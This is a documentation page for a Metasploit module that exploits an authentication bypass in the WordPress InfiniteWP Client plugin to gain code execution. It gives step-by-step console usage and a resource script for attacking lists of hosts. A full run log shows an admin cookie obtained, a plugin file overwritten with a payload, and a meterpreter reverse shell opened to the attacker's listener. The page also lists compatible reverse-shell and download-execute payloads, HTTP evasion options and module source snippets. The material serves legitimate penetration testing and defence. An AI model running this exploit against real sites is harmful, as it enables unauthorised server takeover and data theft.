WordPress InfiniteWP Client Authentication Bypass - Metasploit


This page contains detailed information about how to use the exploit/unix/webapp/wp_infinitewp_auth_bypass metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: WordPress InfiniteWP Client Authentication Bypass
Module: exploit/unix/webapp/wp_infinitewp_auth_bypass
Source code: modules/exploits/unix/webapp/wp_infinitewp_auth_bypass.rb
Disclosure date: 2020-01-14
Last modification time: 2021-02-17 12:33:59 +0000
Supported architecture(s): php
Supported platform(s): PHP
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: -

This module exploits an authentication bypass in the WordPress InfiniteWP Client plugin to log in as an administrator and execute arbitrary PHP code by overwriting the file specified by PLUGIN_FILE. The module will attempt to retrieve the original PLUGIN_FILE contents and restore them after payload execution. If VerifyContents is set, which is the default setting, the module will check to see if the restored contents match the original. Note that a valid administrator username is required for this module. WordPress >= 4.9 is currently not supported due to a breaking WordPress API change. Tested against 4.8.3.

Module Ranking and Traits


Module Ranking:

  • manual: The exploit is unstable or difficult to exploit and is basically a DoS. This ranking is also used when the module has no use unless specifically configured by the user (e.g.: exploit/windows/smb/psexec). More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
  • config-changes: Module modifies some configuration setting on the target machine.

Basic Usage


Using wp_infinitewp_auth_bypass against a single host

Normally, you can use exploit/unix/webapp/wp_infinitewp_auth_bypass this way:

msf > use exploit/unix/webapp/wp_infinitewp_auth_bypass
msf exploit(wp_infinitewp_auth_bypass) > show targets
    ... a list of targets ...
msf exploit(wp_infinitewp_auth_bypass) > set TARGET target-id
msf exploit(wp_infinitewp_auth_bypass) > show options
    ... show and set options ...
msf exploit(wp_infinitewp_auth_bypass) > exploit

Using wp_infinitewp_auth_bypass against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your wp_infinitewp_auth_bypass will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/unix/webapp/wp_infinitewp_auth_bypass")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


Description

This module exploits an authentication bypass in the WordPress InfiniteWP Client plugin to log in as an administrator and execute arbitrary PHP code by overwriting the file specified by PLUGIN_FILE.

The module will attempt to retrieve the original PLUGIN_FILE contents and restore them after payload execution. If VerifyContents is set, which is the default setting, the module will check to see if the restored contents match the original.

Note that a valid administrator username is required for this module.

WordPress >= 4.9 is currently not supported due to a breaking WordPress API change. Tested against 4.8.3.

Setup

  1. Install WordPress 4.8.3 or older
  2. Download https://downloads.wordpress.org/plugin/iwp-client.1.9.4.4.zip
  3. Follow https://wordpress.org/plugins/iwp-client/#installation

Verification Steps


Follow Setup and Scenarios.

Targets


0

This targets InfiniteWP Client versions < 1.9.4.5.

Options


USERNAME

Set this to a known, valid administrator username. Authentication will be bypassed for this user.

PLUGIN_FILE

Set this to a plugin file to insert the payload into, relative to the plugins directory, which is normally /wp-content/plugins. The file must exist and be writable by the web user. It will be overwritten and later restored.

VerifyContents

Verify that the restored contents of PLUGIN_FILE match the original. This is the default setting.

Scenarios


InfiniteWP Client 1.9.4.4 on WordPress 4.8.3

msf5 > use exploit/unix/webapp/wp_infinitewp_auth_bypass
msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > options

Module options (exploit/unix/webapp/wp_infinitewp_auth_bypass):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   PLUGIN_FILE  index.php        yes       Plugin file to edit
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                yes       The base path to the wordpress application
   USERNAME     admin            yes       WordPress username
   VHOST                         no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   InfiniteWP Client < 1.9.4.5


msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > set rport 8000
rport => 8000
msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] WordPress 4.8.3 is a supported target
[*] Found version 1.9.4.4 in the custom file
[+] The target appears to be vulnerable.
[*] Bypassing auth for admin at http://127.0.0.1:8000/
[+] Successfully obtained cookie for admin
[*] Cookie: wordpress_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CgtWIC1eZeuTo2twb615tUCpB4LEUzucWE5qaBl5dgDg%7C3f03c999c52281e3da48bef702b8c8780c3f041b2bba9f222f5d9756cbb18541; wordpress_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CgtWIC1eZeuTo2twb615tUCpB4LEUzucWE5qaBl5dgDg%7C3f03c999c52281e3da48bef702b8c8780c3f041b2bba9f222f5d9756cbb18541; wordpress_logged_in_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CgtWIC1eZeuTo2twb615tUCpB4LEUzucWE5qaBl5dgDg%7Ca0f3f416f7c60a7e0ea1b17af88d4a5e38d96141451f94fe27f605806f03f0c2; wordpress_sec_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CsVlsTRrZ8s8PgSudfIbMXr16rVrlnVz28mENB1jRSOP%7C5ed6dd8146701a38b741bf98cde81cc2b67736b88ea80a10ceba8cf5326b949e; wordpress_sec_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CsVlsTRrZ8s8PgSudfIbMXr16rVrlnVz28mENB1jRSOP%7C5ed6dd8146701a38b741bf98cde81cc2b67736b88ea80a10ceba8cf5326b949e; wordpress_logged_in_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CsVlsTRrZ8s8PgSudfIbMXr16rVrlnVz28mENB1jRSOP%7Cfeffe683bdfaaa670102e6564130394440510bf97e1ad09713ef1c3aa5627bfc;
[+] Successfully logged in as admin
[*] Retrieving original contents of /wp-content/plugins/index.php
[+] Successfully retrieved original contents of /wp-content/plugins/index.php
[*] Contents:
// Silence is golden.
[*] Overwriting /wp-content/plugins/index.php with payload
[*] Acquired a plugin edit nonce: 74cde501ca
[*] Edited plugin file index.php
[+] Successfully overwrote /wp-content/plugins/index.php with payload
[*] Requesting payload at /wp-content/plugins/index.php
[*] Restoring original contents of /wp-content/plugins/index.php
[*] Sending stage (38288 bytes) to 192.168.56.1
[*] Acquired a plugin edit nonce: 74cde501ca
[*] Edited plugin file index.php
[+] Current contents of /wp-content/plugins/index.php match original!
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.1:51923) at 2020-02-07 12:11:28 -0600

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : c7f8fbe7b083
OS          : Linux c7f8fbe7b083 4.19.76-linuxkit #1 SMP Thu Oct 17 19:31:58 UTC 2019 x86_64
Meterpreter : php/linux
meterpreter >

Go back to menu.

Msfconsole Usage


Here is how the unix/webapp/wp_infinitewp_auth_bypass exploit module looks in the msfconsole:

msf6 > use exploit/unix/webapp/wp_infinitewp_auth_bypass

[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_infinitewp_auth_bypass) > show info

       Name: WordPress InfiniteWP Client Authentication Bypass
     Module: exploit/unix/webapp/wp_infinitewp_auth_bypass
   Platform: PHP
       Arch: php
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Manual
  Disclosed: 2020-01-14

Provided by:
  WebARX
  wvu <[email protected]>

Module side effects:
 ioc-in-logs
 config-changes

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   InfiniteWP Client < 1.9.4.5

Check supported:
  Yes

Basic options:
  Name         Current Setting  Required  Description
  ----         ---------------  --------  -----------
  PLUGIN_FILE  index.php        yes       Plugin file to edit
  Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT        80               yes       The target port (TCP)
  SSL          false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI    /                yes       The base path to the wordpress application
  USERNAME     admin            yes       WordPress username
  VHOST                         no        HTTP server virtual host

Payload information:

Description:
  This module exploits an authentication bypass in the WordPress 
  InfiniteWP Client plugin to log in as an administrator and execute 
  arbitrary PHP code by overwriting the file specified by PLUGIN_FILE. 
  The module will attempt to retrieve the original PLUGIN_FILE 
  contents and restore them after payload execution. If VerifyContents 
  is set, which is the default setting, the module will check to see 
  if the restored contents match the original. Note that a valid 
  administrator username is required for this module. WordPress >= 4.9 
  is currently not supported due to a breaking WordPress API change. 
  Tested against 4.8.3.

References:
  https://wpscan.com/vulnerability/10011
  https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/
  https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/
  https://blog.sucuri.net/2020/01/authentication-bypass-vulnerability-in-infinitewp-client.html

Module Options


This is a complete list of options available in the unix/webapp/wp_infinitewp_auth_bypass exploit:

msf6 exploit(unix/webapp/wp_infinitewp_auth_bypass) > show options

Module options (exploit/unix/webapp/wp_infinitewp_auth_bypass):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   PLUGIN_FILE  index.php        yes       Plugin file to edit
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                yes       The base path to the wordpress application
   USERNAME     admin            yes       WordPress username
   VHOST                         no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   InfiniteWP Client < 1.9.4.5

Advanced Options


Here is a complete list of advanced options supported by the unix/webapp/wp_infinitewp_auth_bypass exploit:

msf6 exploit(unix/webapp/wp_infinitewp_auth_bypass) > show advanced

Module advanced options (exploit/unix/webapp/wp_infinitewp_auth_bypass):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   AutoCheck               true                                                no        Run check before exploit
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   ForceExploit            false                                               no        Override check result
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   VerifyContents          true                                                no        Verify file contents
   WORKSPACE                                                                   no        Specify the workspace for this module
   WPCHECK                 true                                                yes       Check if the website is a valid WordPress install
   WPCONTENTDIR            wp-content                                          yes       The name of the wp-content directory
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (php/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the unix/webapp/wp_infinitewp_auth_bypass module can exploit:

msf6 exploit(unix/webapp/wp_infinitewp_auth_bypass) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   InfiniteWP Client < 1.9.4.5

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the unix/webapp/wp_infinitewp_auth_bypass exploit:

msf6 exploit(unix/webapp/wp_infinitewp_auth_bypass) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/generic/custom                                       normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                               normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                            normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/multi/meterpreter/reverse_http                       normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
   4   payload/multi/meterpreter/reverse_https                      normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
   5   payload/php/bind_perl                                        normal  No     PHP Command Shell, Bind TCP (via Perl)
   6   payload/php/bind_perl_ipv6                                   normal  No     PHP Command Shell, Bind TCP (via perl) IPv6
   7   payload/php/bind_php                                         normal  No     PHP Command Shell, Bind TCP (via PHP)
   8   payload/php/bind_php_ipv6                                    normal  No     PHP Command Shell, Bind TCP (via php) IPv6
   9   payload/php/download_exec                                    normal  No     PHP Executable Download and Execute
   10  payload/php/exec                                             normal  No     PHP Execute Command
   11  payload/php/meterpreter/bind_tcp                             normal  No     PHP Meterpreter, Bind TCP Stager
   12  payload/php/meterpreter/bind_tcp_ipv6                        normal  No     PHP Meterpreter, Bind TCP Stager IPv6
   13  payload/php/meterpreter/bind_tcp_ipv6_uuid                   normal  No     PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
   14  payload/php/meterpreter/bind_tcp_uuid                        normal  No     PHP Meterpreter, Bind TCP Stager with UUID Support
   15  payload/php/meterpreter/reverse_tcp                          normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   16  payload/php/meterpreter/reverse_tcp_uuid                     normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   17  payload/php/meterpreter_reverse_tcp                          normal  No     PHP Meterpreter, Reverse TCP Inline
   18  payload/php/reverse_perl                                     normal  No     PHP Command, Double Reverse TCP Connection (via Perl)
   19  payload/php/reverse_php                                      normal  No     PHP Command Shell, Reverse TCP (via PHP)

Evasion Options


Here is the full list of possible evasion options supported by the unix/webapp/wp_infinitewp_auth_bypass exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(unix/webapp/wp_infinitewp_auth_bypass) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Is the site online and running WordPress?


Here is a relevant code snippet related to the "Is the site online and running WordPress?" error message:

75:	    normalize_uri(wordpress_url_plugins, plugin_file)
76:	  end
77:	
78:	  def check
79:	    unless wordpress_and_online?
80:	      return CheckCode::Unknown('Is the site online and running WordPress?')
81:	    end
82:	
83:	    unless (version = wordpress_version)
84:	      return CheckCode::Unknown('Could not detect WordPress version.')
85:	    end

Could not detect WordPress version.


Here is a relevant code snippet related to the "Could not detect WordPress version." error message:

79:	    unless wordpress_and_online?
80:	      return CheckCode::Unknown('Is the site online and running WordPress?')
81:	    end
82:	
83:	    unless (version = wordpress_version)
84:	      return CheckCode::Unknown('Could not detect WordPress version.')
85:	    end
86:	
87:	    if Rex::Version.new(version) >= Rex::Version.new('4.9')
88:	      return CheckCode::Safe("WordPress #{version} is an unsupported target.")
89:	    end

WordPress <VERSION> is an unsupported target.


Here is a relevant code snippet related to the "WordPress <VERSION> is an unsupported target." error message:

83:	    unless (version = wordpress_version)
84:	      return CheckCode::Unknown('Could not detect WordPress version.')
85:	    end
86:	
87:	    if Rex::Version.new(version) >= Rex::Version.new('4.9')
88:	      return CheckCode::Safe("WordPress #{version} is an unsupported target.")
89:	    end
90:	
91:	    vprint_good("WordPress #{version} is a supported target")
92:	
93:	    check_version_from_custom_file(

Here is a relevant code snippet related to the "Could not obtain cookie for <USERNAME>" error message:

109:	      'uri'    => wordpress_url_backend,
110:	      'data'   => "_IWP_JSON_PREFIX_#{Rex::Text.encode_base64(json)}"
111:	    )
112:	
113:	    unless res && res.code == 200 && !(cookie = res.get_cookies).empty?
114:	      fail_with(Failure::NoAccess, "Could not obtain cookie for #{username}")
115:	    end
116:	
117:	    print_good("Successfully obtained cookie for #{username}")
118:	    vprint_status("Cookie: #{cookie}")
119:	

Could not log in as <USERNAME>


Here is a relevant code snippet related to the "Could not log in as <USERNAME>" error message:

121:	  end
122:	
123:	  def exploit
124:	    print_status("Bypassing auth for #{username} at #{full_uri}")
125:	    unless (@cookie = auth_bypass).include?('wordpress_logged_in')
126:	      fail_with(Failure::NoAccess, "Could not log in as #{username}")
127:	    end
128:	
129:	    print_good("Successfully logged in as #{username}")
130:	    write_and_exec_payload
131:	  end

Could not retrieve <PLUGIN_URI>


Here is a relevant code snippet related to the "Could not retrieve <PLUGIN_URI>" error message:

133:	  def write_and_exec_payload
134:	    print_status("Retrieving original contents of #{plugin_uri}")
135:	    contents = wordpress_helper_get_plugin_file_contents(@cookie, plugin_file)
136:	
137:	    unless contents
138:	      fail_with(Failure::UnexpectedReply, "Could not retrieve #{plugin_uri}")
139:	    end
140:	
141:	    print_good("Successfully retrieved original contents of #{plugin_uri}")
142:	    vprint_status('Contents:')
143:	    print(contents)

Could not overwrite <PLUGIN_URI>


Here is a relevant code snippet related to the "Could not overwrite <PLUGIN_URI>" error message:

142:	    vprint_status('Contents:')
143:	    print(contents)
144:	
145:	    print_status("Overwriting #{plugin_uri} with payload")
146:	    unless wordpress_edit_plugin(plugin_file, payload.encoded, @cookie)
147:	      fail_with(Failure::UnexpectedReply, "Could not overwrite #{plugin_uri}")
148:	    end
149:	
150:	    print_good("Successfully overwrote #{plugin_uri} with payload")
151:	
152:	    print_status("Requesting payload at #{plugin_uri}")

Could not restore <PLUGIN_URI>


Here is a relevant code snippet related to the "Could not restore <PLUGIN_URI>" error message:

159:	  end
160:	
161:	  def restore_contents(og_contents)
162:	    print_status("Restoring original contents of #{plugin_uri}")
163:	    unless wordpress_edit_plugin(plugin_file, og_contents, @cookie)
164:	      fail_with(Failure::UnexpectedReply, "Could not restore #{plugin_uri}")
165:	    end
166:	
167:	    return unless datastore['VerifyContents']
168:	
169:	    contents = wordpress_helper_get_plugin_file_contents(@cookie, plugin_file)

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • WebARX
  • wvu

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.